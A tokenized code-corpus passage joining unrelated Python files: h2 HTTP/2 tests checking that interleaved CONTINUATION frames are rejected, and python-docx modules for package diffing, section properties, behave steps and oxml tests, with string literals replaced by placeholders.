expected_outbound_streams <EOL> c . send_data ( <EOL> stream_id = stream_id + <NUM_LIT:1> , <EOL> data = b'<STR_LIT>' , <EOL> end_stream = True , <EOL> ) <EOL> expected_outbound_streams -= <NUM_LIT:1> <EOL> assert c . open_inbound_streams == expected_inbound_streams <EOL> assert c . open_outbound_streams == expected_outbound_streams <EOL> assert c . open_inbound_streams == <NUM_LIT:0> <EOL> assert c . open_outbound_streams == <NUM_LIT:0> <EOL> class TestContinuationFrames ( object ) : <EOL> """<STR_LIT>""" <EOL> example_request_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:/>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) , <EOL> ] <EOL> def _build_continuation_sequence ( self , headers , block_size , frame_factory ) : <EOL> f = frame_factory . build_headers_frame ( headers ) <EOL> header_data = f . data <EOL> chunks = [ <EOL> header_data [ x : x + block_size ] <EOL> for x in range ( <NUM_LIT:0> , len ( header_data ) , block_size ) <EOL> ] <EOL> f . data = chunks . pop ( <NUM_LIT:0> ) <EOL> frames = [ <EOL> frame_factory . build_continuation_frame ( c ) for c in chunks <EOL> ] <EOL> f . flags = set ( [ '<STR_LIT>' ] ) <EOL> frames [ - <NUM_LIT:1> ] . flags . add ( '<STR_LIT>' ) <EOL> frames . insert ( <NUM_LIT:0> , f ) <EOL> return frames <EOL> def test_continuation_frame_basic ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = False ) <EOL> c . initiate_connection ( ) <EOL> c . receive_data ( frame_factory . preamble ( ) ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> events = c . receive_data ( data ) <EOL> assert len ( events ) == <NUM_LIT:2> <EOL> first_event , second_event = events <EOL> assert isinstance ( first_event , h2 . events . RequestReceived ) <EOL> assert first_event . headers == self . example_request_headers <EOL> assert first_event . stream_id == <NUM_LIT:1> <EOL> assert isinstance ( second_event , h2 . events . StreamEnded ) <EOL> assert second_event . stream_id == <NUM_LIT:1> <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <NUM_LIT:3> , <NUM_LIT:1> ] ) <EOL> def test_continuation_cannot_interleave_headers ( self , <EOL> frame_factory , <EOL> stream_id ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = False ) <EOL> c . initiate_connection ( ) <EOL> c . receive_data ( frame_factory . preamble ( ) ) <EOL> c . clear_outbound_data_buffer ( ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_headers_frame ( <EOL> headers = self . example_request_headers , <EOL> stream_id = stream_id , <EOL> flags = [ '<STR_LIT>' ] , <EOL> ) <EOL> frames . insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> def test_continuation_cannot_interleave_data ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = False ) <EOL> c . initiate_connection ( ) <EOL> c . receive_data ( frame_factory . preamble ( ) ) <EOL> c . clear_outbound_data_buffer ( ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_data_frame ( <EOL> data = b'<STR_LIT:hello>' , <EOL> stream_id = <NUM_LIT:1> , <EOL> ) <EOL> frames . insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> def test_continuation_cannot_interleave_unknown_frame ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = False ) <EOL> c . initiate_connection ( ) <EOL> c . receive_data ( frame_factory . preamble ( ) ) <EOL> c . clear_outbound_data_buffer ( ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_data_frame ( <EOL> data = b'<STR_LIT:hello>' , <EOL> stream_id = <NUM_LIT:1> , <EOL> ) <EOL> bogus_frame . type = <NUM_LIT> <EOL> frames . insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> class TestContinuationFramesPushPromise ( object ) : <EOL> """<STR_LIT>""" <EOL> example_request_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:/>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:GET>' ) , <EOL> ] <EOL> example_response_headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> def _build_continuation_sequence ( self , headers , block_size , frame_factory ) : <EOL> f = frame_factory . build_push_promise_frame ( <EOL> stream_id = <NUM_LIT:1> , promised_stream_id = <NUM_LIT:2> , headers = headers <EOL> ) <EOL> header_data = f . data <EOL> chunks = [ <EOL> header_data [ x : x + block_size ] <EOL> for x in range ( <NUM_LIT:0> , len ( header_data ) , block_size ) <EOL> ] <EOL> f . data = chunks . pop ( <NUM_LIT:0> ) <EOL> frames = [ <EOL> frame_factory . build_continuation_frame ( c ) for c in chunks <EOL> ] <EOL> f . flags = set ( [ '<STR_LIT>' ] ) <EOL> frames [ - <NUM_LIT:1> ] . flags . add ( '<STR_LIT>' ) <EOL> frames . insert ( <NUM_LIT:0> , f ) <EOL> return frames <EOL> def test_continuation_frame_basic_push_promise ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> c . send_headers ( stream_id = <NUM_LIT:1> , headers = self . example_request_headers ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> events = c . receive_data ( data ) <EOL> assert len ( events ) == <NUM_LIT:1> <EOL> event = events [ <NUM_LIT:0> ] <EOL> assert isinstance ( event , h2 . events . PushedStreamReceived ) <EOL> assert event . headers == self . example_request_headers <EOL> assert event . parent_stream_id == <NUM_LIT:1> <EOL> assert event . pushed_stream_id == <NUM_LIT:2> <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> def test_continuation_cannot_interleave_headers_pp ( self , <EOL> frame_factory , <EOL> stream_id ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> c . send_headers ( stream_id = <NUM_LIT:1> , headers = self . example_request_headers ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_headers_frame ( <EOL> headers = self . example_response_headers , <EOL> stream_id = stream_id , <EOL> flags = [ '<STR_LIT>' ] , <EOL> ) <EOL> frames . insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> def test_continuation_cannot_interleave_data ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> c . send_headers ( stream_id = <NUM_LIT:1> , headers = self . example_request_headers ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_data_frame ( <EOL> data = b'<STR_LIT:hello>' , <EOL> stream_id = <NUM_LIT:1> , <EOL> ) <EOL> frames . insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> def test_continuation_cannot_interleave_unknown_frame ( self , frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> c . send_headers ( stream_id = <NUM_LIT:1> , headers = self . example_request_headers ) <EOL> frames = self . _build_continuation_sequence ( <EOL> headers = self . example_request_headers , <EOL> block_size = <NUM_LIT:5> , <EOL> frame_factory = frame_factory , <EOL> ) <EOL> assert len ( frames ) > <NUM_LIT:2> <EOL> bogus_frame = frame_factory . build_data_frame ( <EOL> data = b'<STR_LIT:hello>' , <EOL> stream_id = <NUM_LIT:1> , <EOL> ) <EOL> bogus_frame . type = <NUM_LIT> <EOL> frames . insert ( len ( frames ) - <NUM_LIT:2> , bogus_frame ) <EOL> data = b'<STR_LIT>' . join ( f . serialize ( ) for f in frames ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) as e : <EOL> c . receive_data ( data ) <EOL> assert "<STR_LIT>" in str ( e . value ) . lower ( ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ True , False ] ) <EOL> def test_stream_remotely_closed_disallows_push_promise ( self , <EOL> evict , <EOL> frame_factory ) : <EOL> """<STR_LIT>""" <EOL> c = h2 . connection . H2Connection ( client_side = True ) <EOL> c . initiate_connection ( ) <EOL> c . send_headers ( <EOL> stream_id = <NUM_LIT:1> , <EOL> headers = self . example_request_headers , <EOL> end_stream = True <EOL> ) <EOL> f = frame_factory . build_headers_frame ( <EOL> stream_id = <NUM_LIT:1> , <EOL> headers = self . example_response_headers , <EOL> flags = [ '<STR_LIT>' ] <EOL> ) <EOL> c . receive_data ( f . serialize ( ) ) <EOL> c . clear_outbound_data_buffer ( ) <EOL> if evict : <EOL> assert not c . open_outbound_streams <EOL> f = frame_factory . build_push_promise_frame ( <EOL> stream_id = <NUM_LIT:1> , <EOL> promised_stream_id = <NUM_LIT:2> , <EOL> headers = self . example_request_headers , <EOL> ) <EOL> with pytest . raises ( h2 . exceptions . ProtocolError ) : <EOL> c . receive_data ( f . serialize ( ) ) <EOL> f = frame_factory . build_goaway_frame ( <EOL> last_stream_id = <NUM_LIT:0> , <EOL> error_code = h2 . errors . PROTOCOL_ERROR , <EOL> ) <EOL> assert c . data_to_send ( ) == f . serialize ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import re <EOL> from difflib import unified_diff <EOL> from lxml import etree <EOL> def diff ( text_1 , text_2 , filename_1 , filename_2 ) : <EOL> """<STR_LIT>""" <EOL> lines_1 = text_1 . split ( '<STR_LIT:\n>' ) <EOL> lines_2 = text_2 . split ( '<STR_LIT:\n>' ) <EOL> diff_lines = unified_diff ( lines_1 , lines_2 , filename_1 , filename_2 ) <EOL> trimmed_lines = [ ] <EOL> for line in diff_lines : <EOL> if line . endswith ( '<STR_LIT>' ) : <EOL> line = '<STR_LIT>' % line . rstrip ( ) <EOL> trimmed_lines . append ( line ) <EOL> return '<STR_LIT:\n>' . join ( trimmed_lines ) <EOL> def prettify_nsdecls ( xml ) : <EOL> """<STR_LIT>""" <EOL> def parse_attrs ( rootline ) : <EOL> """<STR_LIT>""" <EOL> attr_re = re . compile ( r'<STR_LIT>' ) <EOL> substrs = [ substr . strip ( ) for substr in attr_re . split ( rootline ) <EOL> if substr ] <EOL> head = substrs [ <NUM_LIT:0> ] <EOL> attrs , tail = ( ( substrs [ <NUM_LIT:1> : - <NUM_LIT:1> ] , substrs [ - <NUM_LIT:1> ] ) if len ( substrs ) > <NUM_LIT:1> <EOL> else ( [ ] , '<STR_LIT>' ) ) <EOL> return ( head , attrs , tail ) <EOL> def sequence_attrs ( attributes ) : <EOL> """<STR_LIT>""" <EOL> def_nsdecls , nsdecls , attrs = [ ] , [ ] , [ ] <EOL> for attr in attributes : <EOL> if attr . startswith ( '<STR_LIT>' ) : <EOL> def_nsdecls . append ( attr ) <EOL> elif attr . startswith ( '<STR_LIT>' ) : <EOL> nsdecls . append ( attr ) <EOL> else : <EOL> attrs . append ( attr ) <EOL> return sorted ( def_nsdecls ) + sorted ( nsdecls ) + sorted ( attrs ) <EOL> def pretty_rootline ( head , attrs , tail ) : <EOL> """<STR_LIT>""" <EOL> indent = <NUM_LIT:4> * '<STR_LIT:U+0020>' <EOL> newrootline = head <EOL> for attr in attrs : <EOL> newrootline += '<STR_LIT>' % ( indent , attr ) <EOL> newrootline += '<STR_LIT>' % ( indent , tail ) if tail else '<STR_LIT>' <EOL> return newrootline <EOL> lines = xml . splitlines ( ) <EOL> rootline = lines [ <NUM_LIT:1> ] <EOL> head , attributes , tail = parse_attrs ( rootline ) <EOL> attributes = sequence_attrs ( attributes ) <EOL> lines [ <NUM_LIT:1> ] = pretty_rootline ( head , attributes , tail ) <EOL> return '<STR_LIT:\n>' . join ( lines ) <EOL> class DiffPresenter ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def named_item_diff ( package_1 , package_2 , uri_tail ) : <EOL> """<STR_LIT>""" <EOL> pkg_item_1 = package_1 . find_item_by_uri_tail ( uri_tail ) <EOL> pkg_item_2 = package_2 . find_item_by_uri_tail ( uri_tail ) <EOL> return DiffPresenter . _pkg_item_diff ( pkg_item_1 , pkg_item_2 ) <EOL> @ staticmethod <EOL> def rels_diffs ( package_1 , package_2 ) : <EOL> """<STR_LIT>""" <EOL> package_1_rels_items = package_1 . rels_items <EOL> return DiffPresenter . _pkg_item_diffs ( package_1_rels_items , package_2 ) <EOL> @ staticmethod <EOL> def xml_part_diffs ( package_1 , package_2 ) : <EOL> """<STR_LIT>""" <EOL> package_1_xml_parts = package_1 . xml_parts <EOL> return DiffPresenter . _pkg_item_diffs ( package_1_xml_parts , package_2 ) <EOL> @ staticmethod <EOL> def _pkg_item_diff ( pkg_item_1 , pkg_item_2 ) : <EOL> """<STR_LIT>""" <EOL> item_presenter_1 = ItemPresenter ( pkg_item_1 ) <EOL> item_presenter_2 = ItemPresenter ( pkg_item_2 ) <EOL> text_1 = item_presenter_1 . text <EOL> text_2 = item_presenter_2 . text <EOL> filename_1 = item_presenter_1 . filename <EOL> filename_2 = item_presenter_2 . filename <EOL> return diff ( text_1 , text_2 , filename_1 , filename_2 ) <EOL> @ staticmethod <EOL> def _pkg_item_diffs ( pkg_items , package_2 ) : <EOL> """<STR_LIT>""" <EOL> diffs = [ ] <EOL> for pkg_item in pkg_items : <EOL> uri = pkg_item . uri <EOL> pkg_item_2 = package_2 . find_item_by_uri_tail ( uri ) <EOL> diff = DiffPresenter . _pkg_item_diff ( pkg_item , pkg_item_2 ) <EOL> if diff : <EOL> diffs . append ( diff ) <EOL> return diffs <EOL> class ItemPresenter ( object ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , pkg_item ) : <EOL> """<STR_LIT>""" <EOL> if pkg_item . is_content_types : <EOL> presenter_class = ContentTypesPresenter <EOL> elif pkg_item . is_rels_item : <EOL> presenter_class = RelsItemPresenter <EOL> elif pkg_item . is_xml_part : <EOL> presenter_class = XmlPartPresenter <EOL> else : <EOL> presenter_class = ItemPresenter <EOL> return super ( ItemPresenter , cls ) . __new__ ( presenter_class ) <EOL> def __init__ ( self , pkg_item ) : <EOL> super ( ItemPresenter , self ) . __init__ ( ) <EOL> self . _pkg_item = pkg_item <EOL> @ property <EOL> def filename ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pkg_item . path . replace ( '<STR_LIT:\\>' , '<STR_LIT:/>' ) <EOL> @ property <EOL> def text ( self ) : <EOL> """<STR_LIT>""" <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise NotImplementedError ( msg ) <EOL> @ property <EOL> def xml ( self ) : <EOL> """<STR_LIT>""" <EOL> xml_bytes = etree . tostring ( <EOL> self . _pkg_item . element , encoding = '<STR_LIT>' , pretty_print = True , <EOL> standalone = True ) . strip ( ) <EOL> xml_text = xml_bytes . decode ( '<STR_LIT:utf-8>' ) <EOL> return xml_text <EOL> class ContentTypesPresenter ( ItemPresenter ) : <EOL> def __init__ ( self , pkg_item ) : <EOL> super ( ContentTypesPresenter , self ) . __init__ ( pkg_item ) <EOL> @ property <EOL> def text ( self ) : <EOL> """<STR_LIT>""" <EOL> lines = self . xml . split ( '<STR_LIT:\n>' ) <EOL> defaults = sorted ( [ l for l in lines if l . startswith ( '<STR_LIT>' ) ] ) <EOL> overrides = sorted ( [ l for l in lines if l . startswith ( '<STR_LIT>' ) ] ) <EOL> out_lines = lines [ : <NUM_LIT:2> ] + defaults + overrides + lines [ - <NUM_LIT:1> : ] <EOL> out = '<STR_LIT:\n>' . join ( out_lines ) <EOL> return out <EOL> class RelsItemPresenter ( ItemPresenter ) : <EOL> def __init__ ( self , pkg_item ) : <EOL> super ( RelsItemPresenter , self ) . __init__ ( pkg_item ) <EOL> @ property <EOL> def text ( self ) : <EOL> """<STR_LIT>""" <EOL> def anon ( rel ) : <EOL> return re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , rel ) <EOL> lines = self . xml . split ( '<STR_LIT:\n>' ) <EOL> relationships = [ l for l in lines if l . startswith ( '<STR_LIT>' ) ] <EOL> anon_rels = sorted ( [ anon ( r ) for r in relationships ] ) <EOL> out_lines = lines [ : <NUM_LIT:2> ] + anon_rels + lines [ - <NUM_LIT:1> : ] <EOL> out = '<STR_LIT:\n>' . join ( out_lines ) <EOL> return out <EOL> class XmlPartPresenter ( ItemPresenter ) : <EOL> def __init__ ( self , pkg_item ) : <EOL> super ( XmlPartPresenter , self ) . __init__ ( pkg_item ) <EOL> @ property <EOL> def text ( self ) : <EOL> """<STR_LIT>""" <EOL> return prettify_nsdecls ( self . xml ) </s>
<s> """<STR_LIT>""" <EOL> class InvalidImageStreamError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class UnexpectedEndOfFileError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class UnrecognizedImageError ( Exception ) : <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , print_function <EOL> from copy import deepcopy <EOL> from . . enum . section import WD_ORIENTATION , WD_SECTION_START <EOL> from . simpletypes import ST_SignedTwipsMeasure , ST_TwipsMeasure <EOL> from . xmlchemy import BaseOxmlElement , OptionalAttribute , ZeroOrOne <EOL> class CT_PageMar ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> top = OptionalAttribute ( '<STR_LIT>' , ST_SignedTwipsMeasure ) <EOL> right = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> bottom = OptionalAttribute ( '<STR_LIT>' , ST_SignedTwipsMeasure ) <EOL> left = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> header = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> footer = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> gutter = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> class CT_PageSz ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> w = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> h = OptionalAttribute ( '<STR_LIT>' , ST_TwipsMeasure ) <EOL> orient = OptionalAttribute ( <EOL> '<STR_LIT>' , WD_ORIENTATION , default = WD_ORIENTATION . PORTRAIT <EOL> ) <EOL> class CT_SectPr ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> __child_sequence__ = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ) <EOL> type = ZeroOrOne ( '<STR_LIT>' , successors = ( <EOL> __child_sequence__ [ __child_sequence__ . index ( '<STR_LIT>' ) + <NUM_LIT:1> : ] <EOL> ) ) <EOL> pgSz = ZeroOrOne ( '<STR_LIT>' , successors = ( <EOL> __child_sequence__ [ __child_sequence__ . index ( '<STR_LIT>' ) + <NUM_LIT:1> : ] <EOL> ) ) <EOL> pgMar = ZeroOrOne ( '<STR_LIT>' , successors = ( <EOL> __child_sequence__ [ __child_sequence__ . index ( '<STR_LIT>' ) + <NUM_LIT:1> : ] <EOL> ) ) <EOL> @ property <EOL> def bottom_margin ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . bottom <EOL> @ bottom_margin . setter <EOL> def bottom_margin ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . bottom = value <EOL> def clone ( self ) : <EOL> """<STR_LIT>""" <EOL> clone_sectPr = deepcopy ( self ) <EOL> clone_sectPr . attrib . clear ( ) <EOL> return clone_sectPr <EOL> @ property <EOL> def footer ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . footer <EOL> @ footer . setter <EOL> def footer ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . footer = value <EOL> @ property <EOL> def gutter ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . gutter <EOL> @ gutter . setter <EOL> def gutter ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . gutter = value <EOL> @ property <EOL> def header ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . header <EOL> @ header . setter <EOL> def header ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . header = value <EOL> @ property <EOL> def left_margin ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . left <EOL> @ left_margin . setter <EOL> def left_margin ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . left = value <EOL> @ property <EOL> def right_margin ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . right <EOL> @ right_margin . setter <EOL> def right_margin ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . right = value <EOL> @ property <EOL> def orientation ( self ) : <EOL> """<STR_LIT>""" <EOL> pgSz = self . pgSz <EOL> if pgSz is None : <EOL> return WD_ORIENTATION . PORTRAIT <EOL> return pgSz . orient <EOL> @ orientation . setter <EOL> def orientation ( self , value ) : <EOL> pgSz = self . get_or_add_pgSz ( ) <EOL> pgSz . orient = value <EOL> @ property <EOL> def page_height ( self ) : <EOL> """<STR_LIT>""" <EOL> pgSz = self . pgSz <EOL> if pgSz is None : <EOL> return None <EOL> return pgSz . h <EOL> @ page_height . setter <EOL> def page_height ( self , value ) : <EOL> pgSz = self . get_or_add_pgSz ( ) <EOL> pgSz . h = value <EOL> @ property <EOL> def page_width ( self ) : <EOL> """<STR_LIT>""" <EOL> pgSz = self . pgSz <EOL> if pgSz is None : <EOL> return None <EOL> return pgSz . w <EOL> @ page_width . setter <EOL> def page_width ( self , value ) : <EOL> pgSz = self . get_or_add_pgSz ( ) <EOL> pgSz . w = value <EOL> @ property <EOL> def start_type ( self ) : <EOL> """<STR_LIT>""" <EOL> type = self . type <EOL> if type is None or type . val is None : <EOL> return WD_SECTION_START . NEW_PAGE <EOL> return type . val <EOL> @ start_type . setter <EOL> def start_type ( self , value ) : <EOL> if value is None or value is WD_SECTION_START . NEW_PAGE : <EOL> self . _remove_type ( ) <EOL> return <EOL> type = self . get_or_add_type ( ) <EOL> type . val = value <EOL> @ property <EOL> def top_margin ( self ) : <EOL> """<STR_LIT>""" <EOL> pgMar = self . pgMar <EOL> if pgMar is None : <EOL> return None <EOL> return pgMar . top <EOL> @ top_margin . setter <EOL> def top_margin ( self , value ) : <EOL> pgMar = self . get_or_add_pgMar ( ) <EOL> pgMar . top = value <EOL> class CT_SectType ( BaseOxmlElement ) : <EOL> """<STR_LIT>""" <EOL> val = OptionalAttribute ( '<STR_LIT>' , WD_SECTION_START ) </s>
<s> """<STR_LIT>""" <EOL> from behave import given , then , when <EOL> import docx <EOL> from docx import Document <EOL> from helpers import test_docx <EOL> @ given ( '<STR_LIT>' ) <EOL> def given_I_have_python_docx_installed ( context ) : <EOL> pass <EOL> @ when ( '<STR_LIT>' ) <EOL> def when_I_call_docx_Document_with_no_arguments ( context ) : <EOL> context . document = Document ( ) <EOL> @ when ( '<STR_LIT>' ) <EOL> def when_I_call_docx_Document_with_the_path_of_a_docx_file ( context ) : <EOL> context . document = Document ( test_docx ( '<STR_LIT>' ) ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_document_is_a_Document_object ( context ) : <EOL> document = context . document <EOL> assert isinstance ( document , docx . document . Document ) <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_last_p_contains_specified_text ( context ) : <EOL> document = context . document <EOL> text = context . paragraph_text <EOL> p = document . paragraphs [ - <NUM_LIT:1> ] <EOL> assert p . text == text <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_the_last_paragraph_has_the_style_I_specified ( context ) : <EOL> document , expected_style = context . document , context . style <EOL> paragraph = document . paragraphs [ - <NUM_LIT:1> ] <EOL> assert paragraph . style == expected_style <EOL> @ then ( '<STR_LIT>' ) <EOL> def then_last_p_is_empty_paragraph_added ( context ) : <EOL> document = context . document <EOL> p = document . paragraphs [ - <NUM_LIT:1> ] <EOL> assert p . text == '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> from docx . opc . constants import RELATIONSHIP_TARGET_MODE as RTM <EOL> from docx . opc . oxml import ( <EOL> CT_Default , CT_Override , CT_Relationship , CT_Relationships , CT_Types <EOL> ) <EOL> from docx . oxml . xmlchemy import serialize_for_reading <EOL> from . unitdata . rels import ( <EOL> a_Default , an_Override , a_Relationship , a_Relationships , a_Types <EOL> ) <EOL> class DescribeCT_Default ( object ) : <EOL> def it_provides_read_access_to_xml_values ( self ) : <EOL> default = a_Default ( ) . element <EOL> assert default . extension == '<STR_LIT>' <EOL> assert default . content_type == '<STR_LIT>' <EOL> def it_can_construct_a_new_default_element ( self ) : <EOL> default = CT_Default . new ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected_xml = a_Default ( ) . xml <EOL> assert default . xml == expected_xml <EOL> class DescribeCT_Override ( object ) : <EOL> def it_provides_read_access_to_xml_values ( self ) : <EOL> override = an_Override ( ) . element <EOL> assert override . partname == '<STR_LIT>' <EOL> assert override . content_type == '<STR_LIT>' <EOL> def it_can_construct_a_new_override_element ( self ) : <EOL> override = CT_Override . new ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected_xml = an_Override ( ) . xml <EOL> assert override . xml == expected_xml <EOL> class DescribeCT_Relationship ( object ) : <EOL> def it_provides_read_access_to_xml_values ( self ) : <EOL> rel = a_Relationship ( ) . element <EOL> assert rel . rId == '<STR_LIT>' <EOL> assert rel . reltype == '<STR_LIT>' <EOL> assert rel . target_ref == '<STR_LIT>' <EOL> assert rel . target_mode == RTM . INTERNAL <EOL> def it_can_construct_from_attribute_values ( self ) : <EOL> cases = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , None ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , RTM . INTERNAL ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , RTM . EXTERNAL ) , <EOL> ) <EOL> for rId , reltype , target , target_mode in cases : <EOL> if target_mode is None : <EOL> rel = CT_Relationship . 